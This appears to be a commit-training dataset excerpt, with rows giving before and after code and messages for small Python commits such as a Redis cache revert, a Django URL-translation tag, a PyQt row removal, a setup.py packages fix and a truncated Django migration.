commit stringlengths 40 40 | old_file stringlengths 4 118 | new_file stringlengths 4 118 | old_contents stringlengths 0 2.94k | new_contents stringlengths 1 4.43k | subject stringlengths 15 444 | message stringlengths 16 3.45k | lang stringclasses 1 value | license stringclasses 13 values | repos stringlengths 5 43.2k | prompt stringlengths 17 4.58k | response stringlengths 1 4.43k | prompt_tagged stringlengths 58 4.62k | response_tagged stringlengths 1 4.43k | text stringlengths 132 7.29k | text_tagged stringlengths 173 7.33k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
36d98f499316d4695c20544701dd1d4300aca600 | corehq/ex-submodules/dimagi/utils/couch/cache/cache_core/lib.py | corehq/ex-submodules/dimagi/utils/couch/cache/cache_core/lib.py | from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from django_redis.cache import RedisCache
from . import CACHE_DOCS, key_doc_id, rcache
from corehq.util.soft_assert import soft_assert
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
class HQRedisCache(RedisCache):
def _track_call(self):
hq_assert = soft_assert(['sreddy+redis' + '@' + 'dimagi.com'])
hq_assert(False, msg="Detected Redis multikey operation")
def set_many(self, *args, **kwargs):
self._track_call()
super(HQRedisCache, self).set_many(*args, **kwargs)
def get_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).get_many(*args, **kwargs)
def delete_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).delete_many(*args, **kwargs)
| from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from . import CACHE_DOCS, key_doc_id, rcache
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
| Revert "track multi key ops in Redis" | Revert "track multi key ops in Redis"
| Python | bsd-3-clause | dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq | from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from django_redis.cache import RedisCache
from . import CACHE_DOCS, key_doc_id, rcache
from corehq.util.soft_assert import soft_assert
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
class HQRedisCache(RedisCache):
def _track_call(self):
hq_assert = soft_assert(['sreddy+redis' + '@' + 'dimagi.com'])
hq_assert(False, msg="Detected Redis multikey operation")
def set_many(self, *args, **kwargs):
self._track_call()
super(HQRedisCache, self).set_many(*args, **kwargs)
def get_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).get_many(*args, **kwargs)
def delete_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).delete_many(*args, **kwargs)
Revert "track multi key ops in Redis" | from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from . import CACHE_DOCS, key_doc_id, rcache
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
| <commit_before>from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from django_redis.cache import RedisCache
from . import CACHE_DOCS, key_doc_id, rcache
from corehq.util.soft_assert import soft_assert
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
class HQRedisCache(RedisCache):
def _track_call(self):
hq_assert = soft_assert(['sreddy+redis' + '@' + 'dimagi.com'])
hq_assert(False, msg="Detected Redis multikey operation")
def set_many(self, *args, **kwargs):
self._track_call()
super(HQRedisCache, self).set_many(*args, **kwargs)
def get_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).get_many(*args, **kwargs)
def delete_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).delete_many(*args, **kwargs)
<commit_msg>Revert "track multi key ops in Redis"<commit_after> | from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from . import CACHE_DOCS, key_doc_id, rcache
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
| from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from django_redis.cache import RedisCache
from . import CACHE_DOCS, key_doc_id, rcache
from corehq.util.soft_assert import soft_assert
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
class HQRedisCache(RedisCache):
def _track_call(self):
hq_assert = soft_assert(['sreddy+redis' + '@' + 'dimagi.com'])
hq_assert(False, msg="Detected Redis multikey operation")
def set_many(self, *args, **kwargs):
self._track_call()
super(HQRedisCache, self).set_many(*args, **kwargs)
def get_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).get_many(*args, **kwargs)
def delete_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).delete_many(*args, **kwargs)
Revert "track multi key ops in Redis"from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from . import CACHE_DOCS, key_doc_id, rcache
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
| <commit_before>from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from django_redis.cache import RedisCache
from . import CACHE_DOCS, key_doc_id, rcache
from corehq.util.soft_assert import soft_assert
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
class HQRedisCache(RedisCache):
def _track_call(self):
hq_assert = soft_assert(['sreddy+redis' + '@' + 'dimagi.com'])
hq_assert(False, msg="Detected Redis multikey operation")
def set_many(self, *args, **kwargs):
self._track_call()
super(HQRedisCache, self).set_many(*args, **kwargs)
def get_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).get_many(*args, **kwargs)
def delete_many(self, *args, **kwargs):
self._track_call()
return super(HQRedisCache, self).delete_many(*args, **kwargs)
<commit_msg>Revert "track multi key ops in Redis"<commit_after>from __future__ import absolute_import
from __future__ import unicode_literals
import simplejson
from . import CACHE_DOCS, key_doc_id, rcache
def invalidate_doc_generation(doc):
from .gen import GenerationCache
doc_type = doc.get('doc_type', None)
generation_mgr = GenerationCache.doc_type_generation_map()
if doc_type in generation_mgr:
generation_mgr[doc_type].invalidate_all()
def _get_cached_doc_only(doc_id):
"""
helper cache retrieval method for open_doc - for use by views in retrieving their docs.
"""
doc = rcache().get(key_doc_id(doc_id), None)
if doc and CACHE_DOCS:
return simplejson.loads(doc)
else:
return None
|
786de8ec482ed67b78696357c66dfa9292eea62f | tk/templatetags.py | tk/templatetags.py | from django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
url = reverse(view.view_name, args=args, kwargs=kwargs)
return url
| from django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
if hasattr(context.get('object', None), 'get_absolute_url'):
with translation.override(language):
return context['object'].get_absolute_url()
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
return reverse(view.view_name, args=args, kwargs=kwargs)
| Fix getting the translated urls for material detail views | Fix getting the translated urls for material detail views
| Python | agpl-3.0 | GISAElkartea/tresna-kutxa,GISAElkartea/tresna-kutxa,GISAElkartea/tresna-kutxa,GISAElkartea/tresna-kutxa | from django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
url = reverse(view.view_name, args=args, kwargs=kwargs)
return url
Fix getting the translated urls for material detail views | from django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
if hasattr(context.get('object', None), 'get_absolute_url'):
with translation.override(language):
return context['object'].get_absolute_url()
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
return reverse(view.view_name, args=args, kwargs=kwargs)
| <commit_before>from django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
url = reverse(view.view_name, args=args, kwargs=kwargs)
return url
<commit_msg>Fix getting the translated urls for material detail views<commit_after> | from django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
if hasattr(context.get('object', None), 'get_absolute_url'):
with translation.override(language):
return context['object'].get_absolute_url()
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
return reverse(view.view_name, args=args, kwargs=kwargs)
| from django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
url = reverse(view.view_name, args=args, kwargs=kwargs)
return url
Fix getting the translated urls for material detail viewsfrom django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
if hasattr(context.get('object', None), 'get_absolute_url'):
with translation.override(language):
return context['object'].get_absolute_url()
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
return reverse(view.view_name, args=args, kwargs=kwargs)
| <commit_before>from django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
url = reverse(view.view_name, args=args, kwargs=kwargs)
return url
<commit_msg>Fix getting the translated urls for material detail views<commit_after>from django.core.urlresolvers import reverse, resolve
from django.template import Library
from django.utils import translation
from django.templatetags.i18n import register
@register.simple_tag(takes_context=True)
def translate_url(context, language):
if hasattr(context.get('object', None), 'get_absolute_url'):
with translation.override(language):
return context['object'].get_absolute_url()
view = resolve(context['request'].path)
args = [a for a in view.args if a is not None]
kwargs = {k:v for k,v in view.kwargs.items() if v is not None}
with translation.override(language):
return reverse(view.view_name, args=args, kwargs=kwargs)
|
a66ba9970675cbc0a79ec683d8db6046865d022e | OnionLauncher/main.py | OnionLauncher/main.py | import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(int(row))
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
| import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(row)
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
| Remove useless conversion in remove row code | Remove useless conversion in remove row code
| Python | bsd-2-clause | neelchauhan/OnionLauncher | import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(int(row))
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
Remove useless conversion in remove row code | import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(row)
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
| <commit_before>import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(int(row))
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
<commit_msg>Remove useless conversion in remove row code<commit_after> | import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(row)
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
| import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(int(row))
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
Remove useless conversion in remove row codeimport sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(row)
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
| <commit_before>import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(int(row))
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
<commit_msg>Remove useless conversion in remove row code<commit_after>import sys
from PyQt5.QtWidgets import QApplication, QMainWindow
from PyQt5.uic import loadUi
class MainWindow(QMainWindow):
def __init__(self, *args):
super(MainWindow, self).__init__(*args)
loadUi("ui_files/main.ui", self)
self.tbAdd.clicked.connect(self.addRow)
self.tbRemove.clicked.connect(self.removeRow)
def addRow(self):
rowPos = self.twSettings.rowCount()
self.twSettings.insertRow(rowPos)
def removeRow(self):
rows = sorted(set(index.row() for index in self.twSettings.selectedIndexes()))
rows.reverse()
for row in rows:
self.twSettings.removeRow(row)
if __name__ == "__main__":
app = QApplication(sys.argv)
mw = MainWindow()
mw.show()
sys.exit(app.exec_())
|
affc6d644a5a259b1237df419b32b7001431ea6f | setup.py | setup.py | #!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as file_readme:
readme = file_readme.read()
setup(name='json-sempai',
version='0.3.0',
description='Use JSON files as if they\'re python modules',
long_description=readme,
author='Louis Taylor',
author_email='kragniz@gmail.com',
license='MIT',
url='https://github.com/kragniz/json-sempai',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='please don\'t use this library for anything',
packages=['jsonsempai'],
test_suite='jsonsempai.tests'
)
| #!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as file_readme:
readme = file_readme.read()
setup(name='json-sempai',
version='0.3.0',
description='Use JSON files as if they\'re python modules',
long_description=readme,
author='Louis Taylor',
author_email='kragniz@gmail.com',
license='MIT',
url='https://github.com/kragniz/json-sempai',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='please don\'t use this library for anything',
packages=['jsonsempai', 'jsonsempai.tests'],
test_suite='jsonsempai.tests'
)
| Add jsonsempai.tests to list of packages to install | Add jsonsempai.tests to list of packages to install
Closes: #10
| Python | mit | kragniz/json-sempai | #!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as file_readme:
readme = file_readme.read()
setup(name='json-sempai',
version='0.3.0',
description='Use JSON files as if they\'re python modules',
long_description=readme,
author='Louis Taylor',
author_email='kragniz@gmail.com',
license='MIT',
url='https://github.com/kragniz/json-sempai',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='please don\'t use this library for anything',
packages=['jsonsempai'],
test_suite='jsonsempai.tests'
)
Add jsonsempai.tests to list of packages to install
Closes: #10 | #!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as file_readme:
readme = file_readme.read()
setup(name='json-sempai',
version='0.3.0',
description='Use JSON files as if they\'re python modules',
long_description=readme,
author='Louis Taylor',
author_email='kragniz@gmail.com',
license='MIT',
url='https://github.com/kragniz/json-sempai',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='please don\'t use this library for anything',
packages=['jsonsempai', 'jsonsempai.tests'],
test_suite='jsonsempai.tests'
)
| <commit_before>#!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as file_readme:
readme = file_readme.read()
setup(name='json-sempai',
version='0.3.0',
description='Use JSON files as if they\'re python modules',
long_description=readme,
author='Louis Taylor',
author_email='kragniz@gmail.com',
license='MIT',
url='https://github.com/kragniz/json-sempai',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='please don\'t use this library for anything',
packages=['jsonsempai'],
test_suite='jsonsempai.tests'
)
<commit_msg>Add jsonsempai.tests to list of packages to install
Closes: #10<commit_after> | #!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as file_readme:
readme = file_readme.read()
setup(name='json-sempai',
version='0.3.0',
description='Use JSON files as if they\'re python modules',
long_description=readme,
author='Louis Taylor',
author_email='kragniz@gmail.com',
license='MIT',
url='https://github.com/kragniz/json-sempai',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='please don\'t use this library for anything',
packages=['jsonsempai', 'jsonsempai.tests'],
test_suite='jsonsempai.tests'
)
| #!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as file_readme:
readme = file_readme.read()
setup(name='json-sempai',
version='0.3.0',
description='Use JSON files as if they\'re python modules',
long_description=readme,
author='Louis Taylor',
author_email='kragniz@gmail.com',
license='MIT',
url='https://github.com/kragniz/json-sempai',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='please don\'t use this library for anything',
packages=['jsonsempai'],
test_suite='jsonsempai.tests'
)
Add jsonsempai.tests to list of packages to install
Closes: #10#!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as file_readme:
readme = file_readme.read()
setup(name='json-sempai',
version='0.3.0',
description='Use JSON files as if they\'re python modules',
long_description=readme,
author='Louis Taylor',
author_email='kragniz@gmail.com',
license='MIT',
url='https://github.com/kragniz/json-sempai',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='please don\'t use this library for anything',
packages=['jsonsempai', 'jsonsempai.tests'],
test_suite='jsonsempai.tests'
)
| <commit_before>#!/usr/bin/env python
# Setup script for json-sempai.
# Prefer setuptools; fall back to distutils on minimal installs.
try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup

# The README doubles as the PyPI long description.
with open('README.rst') as file_readme:
    readme = file_readme.read()

# NOTE(review): test_suite points at 'jsonsempai.tests', but that
# sub-package is not listed in packages, so it will not be installed —
# confirm whether 'jsonsempai.tests' should be added to packages.
setup(name='json-sempai',
      version='0.3.0',
      description='Use JSON files as if they\'re python modules',
      long_description=readme,
      author='Louis Taylor',
      author_email='kragniz@gmail.com',
      license='MIT',
      url='https://github.com/kragniz/json-sempai',
      classifiers=[
          'Intended Audience :: Developers',
          'License :: OSI Approved :: MIT License',
          'Programming Language :: Python',
          'Programming Language :: Python :: 2.6',
          'Programming Language :: Python :: 2.7',
          'Programming Language :: Python :: 3.2',
          'Programming Language :: Python :: 3.3',
          'Programming Language :: Python :: 3.4',
      ],
      keywords='please don\'t use this library for anything',
      packages=['jsonsempai'],
      test_suite='jsonsempai.tests'
      )
<commit_msg>Add jsonsempai.tests to list of packages to install
Closes: #10<commit_after>#!/usr/bin/env python
# Setup script for json-sempai.
# Prefer setuptools; fall back to distutils on minimal installs.
try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup

# The README doubles as the PyPI long description.
with open('README.rst') as file_readme:
    readme = file_readme.read()

setup(name='json-sempai',
      version='0.3.0',
      description='Use JSON files as if they\'re python modules',
      long_description=readme,
      author='Louis Taylor',
      author_email='kragniz@gmail.com',
      license='MIT',
      url='https://github.com/kragniz/json-sempai',
      classifiers=[
          'Intended Audience :: Developers',
          'License :: OSI Approved :: MIT License',
          'Programming Language :: Python',
          'Programming Language :: Python :: 2.6',
          'Programming Language :: Python :: 2.7',
          'Programming Language :: Python :: 3.2',
          'Programming Language :: Python :: 3.3',
          'Programming Language :: Python :: 3.4',
      ],
      keywords='please don\'t use this library for anything',
      # The tests sub-package is installed too, so test_suite resolves.
      packages=['jsonsempai', 'jsonsempai.tests'],
      test_suite='jsonsempai.tests'
      )
|
91165642fb40165987ab0ff734959f88712e514c | humblemedia/resources/migrations/0001_initial.py | humblemedia/resources/migrations/0001_initial.py | # encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
    """Initial migration for the resources app: creates ``Resource``."""

    dependencies = [
        # The author FK targets the swappable user model, so the auth
        # and contenttypes apps must be migrated before this one.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('auth', '__first__'),
        ('contenttypes', '__first__'),
    ]

    operations = [
        migrations.CreateModel(
            name='Resource',
            fields=[
                ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
                ('title', models.CharField(max_length=64)),
                ('description', models.TextField()),
                ('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
                ('file', models.FileField(upload_to='resources/')),
